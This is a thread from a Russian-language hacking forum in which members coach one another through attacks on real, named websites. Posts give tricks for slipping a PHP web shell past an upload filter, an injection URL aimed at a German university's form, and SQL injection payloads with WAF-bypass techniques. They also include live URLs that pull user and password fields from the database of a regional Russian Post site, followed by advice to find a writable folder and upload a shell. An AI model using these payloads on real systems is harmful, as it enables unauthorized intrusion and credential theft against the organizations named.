Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    136
    Likes Received:
    6
    Reputations:
    0
    Есть доступ в админке Торрент пиер, версия 2.4 Stable (R400). Добавлю php расширения чтоб залить шелл, загружаю пхп шелл, но расширении шелла после загрузки изменяется вот таком виде _php_. Есть ли еще способы залить шелл? Уважаемые помогите.
     
  2. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,785
    Likes Received:
    808
    Reputations:
    851
    py, shtml, cgi, pl, phtml

    А вообще надо посмотреть по какой маске файл переименовывается.
     
    _________________________
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,441
    Likes Received:
    753
    Reputations:
    834
    Видно что обрабатывается регуляркой, к перечисленному можно также поиграться с регистром букв в расширении.
     
    _________________________
    1 person likes this.
  4. d4rk73rr0r

    d4rk73rr0r Member

    Joined:
    2 Jan 2013
    Messages:
    136
    Likes Received:
    6
    Reputations:
    0
    Спасибо, сделал как вы сказали Шелл залился. но еще один косяк появился "403 Forbidden". Видимо там есть .htaccess. А можно ли таким способам залить пустой .htaccess?
     
  5. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    Ребята, так от же код есть! https://get.torrentpier.me/?old=1 Качните и посмотрите код что да и как там кому нужно.
     
    _________________________
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,437
    Likes Received:
    398
    Reputations:
    228
    Помогите раскрутить)
    Code:
    http://www.hs-karlsruhe.de/studierende/career-services/existenzgruendung/umfrage-start-up/umfrageformular-start-up.html?tx_powermail_pi1%5Baction%5D=confirmation&tx_powermail_pi1[__referrer][@extension]=Powermail&tx_powermail_pi1[__trustedProperties]=a:2:{s:5:%22field%22;a:5:{s:6:%22UID332%22;i:1;s:6:%22UID333%22;i:1;s:6:%22UID338%22;i:1;s:6:%22UID334%22;i:1;s:4:%22__hp%22;i:1;}s:4:%22mail%22;a:1:{s:4:%22form%22;i:1;}}20cf2e8161f6dd6d8c7a69e5ca62625ea6a4f36a&tx_powermail_pi1[field][__hp]=&tx_powermail_pi1[mail][form]=55
    пробелы убрать
     
    #23946 DezMond™, 9 Mar 2015
    Last edited: 9 Mar 2015
  7. 5maks5

    5maks5 Elder - Старейшина

    Joined:
    29 Aug 2010
    Messages:
    505
    Likes Received:
    261
    Reputations:
    40
    Подчисти сначала сам, прояви уважение.
    В этой лапше я так и не понял какие параметры не фильтруются.
     
    1 person likes this.
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,437
    Likes Received:
    398
    Reputations:
    228
    урезал, см. тот же пост
     
  9. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,785
    Likes Received:
    808
    Reputations:
    851
    Дружище, что ты куришь?

    Как ??? Как ты ищешь такие сайты ???

    Это какой-то dork ??
     
    _________________________
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,437
    Likes Received:
    398
    Reputations:
    228
    Такие сайты попадаются на typo3... что поделать-то(
     
    1 person likes this.
  11. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Здраствуйте. Помогите разобратся. Нашел скулю и все хорошо, нашел таблицу user, нашел в ней столбцы User, Password. Хочу вывести но когда сталю

    id=-561'+union+select+1,User,Password,4,5,6,7+FROM+user+--+

    ничего не выводить. Помогите, как зделать?
     
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    захексить или зачарить, или добавить лимит, или заюзать что-то типа:
    INSERT(insert(table_schema,1,0,0x3a3a3a),1,0,tAble_Name)
    MAKE_SET(1|2,@@version,USER())
    EXPORT_SET(1,user(),version(),',',2)
    LPAD('Chat','8','Anti')
    или обойти WAF,например, если
    403: Access Forbidden
    Обходится элементарно с помощью "(" и ")", /**/, %0А, %0d, %09, %20 и т.д., или
    Sucuri WebSite Firewall - CloudProxy - Access Denied
    Обходится так: union/*123*/select
    и т.д.
    Короче, вобщем смотря по ситуации что там.
     
    _________________________
    #23952 Strilo4ka, 9 Mar 2015
    Last edited: 9 Mar 2015
  13. billybonse

    billybonse Member

    Joined:
    9 Oct 2011
    Messages:
    55
    Likes Received:
    6
    Reputations:
    1
    или поля пустые
     
    1 person likes this.
  14. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Может быть кодировка.
    concat_ws(0x3a,convert(user%20using%20utf8),convert(password%20using%20utf8))
     
    _________________________
  15. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    Вот скуля

    www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+news--

    ничего не выводит, что тут делать?
     
  16. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    490
    Likes Received:
    168
    Reputations:
    126
    Дело в том, что надо указывать бд
    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,2,url,4,5,6,7+from+konkurs.news--

    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ftpusers.users--

    а вообще
    root
    mq off
     
    _________________________
    #23956 kingbeef, 10 Mar 2015
    Last edited: 10 Mar 2015
    1 person likes this.
  17. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    узнал бд. называется ufps. и подставляю, получается

    http://www.volgufps.ru/pochtamt5.php?pocht=-1+union+select+1,User,Password,4,5,6,7+from+ufps.users--

    все равно ошибка, пожалуйста подскажите, что такое?
     
    #23957 teh, 10 Mar 2015
    Last edited: 10 Mar 2015
  18. yarbabin

    yarbabin HACKIN YO KUT

    Joined:
    21 Nov 2007
    Messages:
    1,682
    Likes Received:
    889
    Reputations:
    363
    ufps это current_table. а тебе нужна база, в которой лежит таблица users. а лежит она в базе ftpusers
    Code:
    from ftpusers.users
     
    _________________________
  19. teh

    teh Member

    Joined:
    2 Dec 2010
    Messages:
    79
    Likes Received:
    6
    Reputations:
    -2
    А как вы узнали что таблица лежить в базе ftpusers. Никак немогу понять, можете рассказать пожалуйста
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,441
    Likes Received:
    753
    Reputations:
    834
    либо почитай мануал, как узнать таблици и колонки в БД
    права БД рутовые, кавычки не фильтруются и не слешируются:
    вам остается только найти врайтабельную папку и залить шелл

    P.S: 2011 УФПС Волгоградской области
    - филиал ФГУП «Почта России»


    Помните об ответственности ломая подобные ресурсы!!!
     
    _________________________
    #23960 winstrool, 10 Mar 2015
    Last edited: 10 Mar 2015
Loading...
Thread Status:
Not open for further replies.